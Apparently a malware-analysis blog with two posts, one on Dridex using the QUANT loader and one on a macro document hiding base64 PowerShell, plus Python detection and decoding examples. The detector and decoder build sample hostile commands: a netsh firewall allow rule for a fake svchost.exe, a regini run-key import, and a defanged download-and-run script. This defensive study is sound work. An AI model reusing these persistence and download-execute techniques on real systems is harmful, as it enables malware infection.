
Friday, December 8, 2017

Dridex is using QUANT Loader


Dridex is one of the well-known malware families today. It is one of the malware families delivered by spam e-mail campaigns to infect users.

The interesting part is that some of its samples are now using the QUANT loader to execute their code. QUANT is a loader used by different malware families to bypass detection, the firewall, etc.

Let us dig more... :)

At first look the file is heavily packed and needs to be unpacked to see the actual code.

fig. 1 packed code of Dridex

Once the file is unpacked using a debugger and some reverse engineering, we can see some interesting strings that may give us a hint of what it will try to do and how it was compiled.

Based on fig. 2 below, it looks like the unpacked code was compiled using MINGW32.

fig. 2 MINGW32 string

In fig. 3 we can see that there is a base64-encoded string, some hash values and a string that may be related to a URL, "index.php". So we can initially say that this file is able to connect to a URL.

fig. 3 some unique strings

fig. 3.1 common internet download API


Now let's go deeper into the code, and we will see that Dridex uses the "QUANT" loader to execute its code.

The first interesting thing is how it concatenates all its decrypted strings using the hash values we saw in the string analysis, and executes them later.


fig. 4 decryption routine

fig. 5 decrypted string

It will create a copy of itself in %appdata%/randomnumber/svchost.exe.

fig. 6 copy of itself


Then you will see the common characteristic of the QUANT loader, where it assembles its netsh command to allow the copy of itself through the firewall.

fig. 7 netsh command

It will also assemble a URL to connect to.

fig. 8 url link

It will also call "CreateFile" on the copy of itself, "svchost.exe", with the alternate data stream "Zone.Identifier". This ADS is used to record where a file came from and to raise a security flag if the file is untrusted.

fig. 8 Zone.Identifier ADS
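Since the sample touches the Zone.Identifier stream, it helps to know what that stream actually holds. Below is an added example (not code from the post or from the sample) that parses the documented `[ZoneTransfer]` INI-style content of a Zone.Identifier ADS and maps the `ZoneId` to its security zone name. The stream contents used as input are constructed for the example; `read_zone_identifier` opens the `path:Zone.Identifier` stream and only works on Windows/NTFS.

```python
import re

# Zone ids as used by the Windows URL security zones (Internet Explorer zone model).
ZONE_NAMES = {
    0: "LocalMachine",
    1: "LocalIntranet",
    2: "TrustedSites",
    3: "Internet",
    4: "RestrictedSites",
}

# Constructed sample: what a browser typically writes for a file downloaded from the internet.
SAMPLE_STREAM = (
    b"[ZoneTransfer]\r\n"
    b"ZoneId=3\r\n"
    b"ReferrerUrl=https://example.invalid/\r\n"
    b"HostUrl=https://example.invalid/payload.bin\r\n"
)


def parse_zone_identifier(data: bytes) -> dict:
    """Parse the raw bytes of a Zone.Identifier stream into a dict.

    Only keys under the [ZoneTransfer] section are kept; a ZoneName entry
    is added when ZoneId is a known zone number.
    """
    text = data.decode("utf-8", errors="replace")
    result = {}
    section = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            section = m.group(1)
            continue
        if section != "ZoneTransfer" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        result[key.strip()] = value.strip()
    if "ZoneId" in result:
        try:
            zone = int(result["ZoneId"])
        except ValueError:
            zone = None
        result["ZoneName"] = ZONE_NAMES.get(zone, "Unknown")
    return result


def read_zone_identifier(path: str):
    """Read and parse the Zone.Identifier ADS of a file (Windows/NTFS only).

    Returns None when the file has no such stream or the platform does not
    expose alternate data streams through the path syntax.
    """
    try:
        with open(path + ":Zone.Identifier", "rb") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:
        return None


if __name__ == "__main__":
    info = parse_zone_identifier(SAMPLE_STREAM)
    print(f"ZoneId={info['ZoneId']} ({info['ZoneName']}) from {info.get('HostUrl')}")
```

A file that a process wrote to `%appdata%` itself normally has no Zone.Identifier stream at all, so when triaging a dropped `svchost.exe` the presence, absence, or an unexpected `ZoneId` on that stream is worth recording alongside the file hash.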

Next it will get the username of the infected machine by calling GetUserName, then create a command line that changes the user's permission on the copy of itself to read-only. Then it runs the copy of itself, svchost.exe, in %appdata%.

fig. 9 modifying the permission of the infected user


fig. 10 running the copy of itself

The malware checks whether the running instance is the copy of itself by comparing the file path of svchost.exe with its module file name. If yes, it will create an autorun registry entry using regini.exe and a file containing the run-key hive entries placed in %temp%/per

fig. 11 autorun registry creation
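The netsh firewall exception, the copy named svchost.exe under %appdata%, and the regini.exe run-key import are all visible in process-creation telemetry. Below is an added detection example (my own code, not from the post or the sample) that runs a few simple checks over constructed process events. The exact netsh syntax the sample uses is not shown in the post, so both the legacy `netsh firewall add allowedprogram` form and the `netsh advfirewall firewall add rule` form are matched; the user names, random directory number and the `PLACEHOLDER.ini` file name are made up for the example.

```python
import re
from dataclasses import dataclass

# Directories a normal user can write to; binaries launched from here deserve a closer look.
USER_WRITABLE = re.compile(r"\\AppData\\(Roaming|Local\\Temp)\\", re.I)


@dataclass
class ProcEvent:
    """One process-creation event, as a sensor would report it."""
    image: str     # full path of the created process
    cmdline: str   # its command line


def flags_for(ev: ProcEvent) -> list:
    """Return the list of detection flags that fire for one event."""
    flags = []
    image = ev.image.lower()
    cl = ev.cmdline.lower()

    # 1. netsh adding a firewall allow entry for a program in a user-writable directory.
    if image.endswith("\\netsh.exe"):
        legacy = "allowedprogram" in cl
        modern = "advfirewall" in cl and "add rule" in cl and "action=allow" in cl
        if (legacy or modern) and USER_WRITABLE.search(ev.cmdline):
            flags.append("netsh-allow-userdir")

    # 2. regini.exe importing registry data from a script in a user-writable directory.
    if image.endswith("\\regini.exe") and USER_WRITABLE.search(ev.cmdline):
        flags.append("regini-from-userdir")

    # 3. A process called svchost.exe that does not live in System32/SysWOW64.
    if image.endswith("\\svchost.exe") and not (
        "\\windows\\system32\\" in image or "\\windows\\syswow64\\" in image
    ):
        flags.append("svchost-outside-system32")

    return flags


def triage_events(events) -> list:
    """Evaluate every event; returns (image, flags) pairs in input order."""
    return [(ev.image, flags_for(ev)) for ev in events]


# Constructed sample telemetry (not from the real infection).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\netsh.exe",
              r'netsh firewall add allowedprogram "C:\Users\bob\AppData\Roaming\48213\svchost.exe" svchost ENABLE'),
    ProcEvent(r"C:\Windows\System32\regini.exe",
              r"regini.exe C:\Users\bob\AppData\Local\Temp\PLACEHOLDER.ini"),
    ProcEvent(r"C:\Users\bob\AppData\Roaming\48213\svchost.exe",
              r"C:\Users\bob\AppData\Roaming\48213\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),  # benign
]


if __name__ == "__main__":
    for image, flags in triage_events(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(flags) if flags else 'clean'}")
```

Any one of these flags on its own is noisy (administrators do add firewall rules, and regini.exe has legitimate uses), but two or three of them within a minute from the same user session is the pattern the figures above describe.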


One of the notable behaviors of its UPX-packed component, stored in its resource section, is that it parses some computer information and sends it to its C&C server, RC4-encrypted with a specific RC4 key.
Some sensitive information:
  • Computername
  • ProductVersion
  • SystemInfo (Processor)
  • Memory Status


fig. 12 some information it tries to steal
Thursday, November 30, 2017

Another Macro Obfuscation Technique...


Sha1: 98010df0a368151f9d831d3e18e957137600d142 
Filename: Purchase Order _ 5894568.doc1.bin


I found a macro malware sample hosted by the spam campaign that happened last October 10, 2017, and the technique it uses to hide its encrypted code was interesting.



At first glance, the document looks very suspicious: it contains the picture shown in fig. 1 and asks the user to enable macros to see the document.

fig. 1: common macro social engineering approach

Using Didier Stevens' tool 'oledump.py', I did a quick static analysis and confirmed that the document contains macro code.


fig. 2: macro code

So I looked deeper into the macro code and found an interesting way it hides the base64-encoded script code in its body. It uses BuiltInDocumentProperties("comments") to hide it. It parses that base64-encoded code with a specific length, then concatenates it with other base64-encoded strings to form the script it will execute using powershell -e.

fig. 3: b64 encoded script

As I decode the base64 string, it produces an obfuscated script as shown in fig. 4. Using a Python script to deobfuscate it shows that it will download an .exe file from a malicious URL, save it in %temp% and then execute it without user consent.

fig. 4: obfuscated script


fig. 5: decrypted script
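The detail that trips people up when decoding a `powershell -e` payload is that the base64 wraps UTF-16LE text, not ASCII, so a plain base64 decode gives bytes interleaved with NULs. Below is an added example (my own code, not from the post or the sample) that reassembles base64 chunks the way the macro does (pieces pulled from the document properties concatenated with pieces from the macro body), decodes them as UTF-16LE, and pulls out the triage indicators the post cares about: URLs, %temp% drop paths and whether the script launches something. The script text, the chunk boundaries and the `Get-Stage` cmdlet name are constructed for the example; `Get-Stage` is not a real cmdlet.

```python
import base64
import re

# Constructed stand-in for the decoded script; Get-Stage is a made-up name, not a real cmdlet.
SAMPLE_SCRIPT = r"""$u='http://example.invalid/payload.exe';$p="$env:temp\payload.exe";Get-Stage $u $p;Start-Process $p"""


def build_encoded_command(script: str) -> str:
    """Encode a script the way powershell -e expects it: base64 of UTF-16LE text.

    Used here only to construct the sample offline.
    """
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def split_like_macro(encoded: str, sizes=(40, 60)) -> list:
    """Cut the encoded string into chunks, mimicking the macro's fixed-length pieces."""
    chunks, pos = [], 0
    for n in sizes:
        chunks.append(encoded[pos:pos + n])
        pos += n
    chunks.append(encoded[pos:])
    return chunks


# Constructed chunks: the first would sit in BuiltInDocumentProperties("comments"),
# the rest inline in the macro body.
SAMPLE_CHUNKS = split_like_macro(build_encoded_command(SAMPLE_SCRIPT))


def decode_encoded_command(chunks) -> str:
    """Concatenate the base64 pieces, fix padding and decode as UTF-16LE."""
    b64 = "".join(c.strip() for c in chunks)
    b64 += "=" * (-len(b64) % 4)  # macros sometimes drop the trailing '=' padding
    return base64.b64decode(b64).decode("utf-16-le")


def triage(script: str) -> dict:
    """Extract the indicators an analyst records first from a decoded script."""
    return {
        "urls": re.findall(r"https?://[^\s'\"()]+", script),
        "drop_paths": re.findall(r"\$env:temp\\[^\s'\"]+|%temp%\\[^\s'\"]+", script, re.I),
        "executes": bool(re.search(r"Start-Process|Invoke-Item|\.Start\(", script, re.I)),
    }


if __name__ == "__main__":
    decoded = decode_encoded_command(SAMPLE_CHUNKS)
    print(decoded)
    print(triage(decoded))
```

If the decoded text looks like `$ u ' h t t p` with spaces between every character, the payload was decoded as ASCII instead of UTF-16LE; if it is mostly replacement characters, the chunks were concatenated in the wrong order or one chunk is missing.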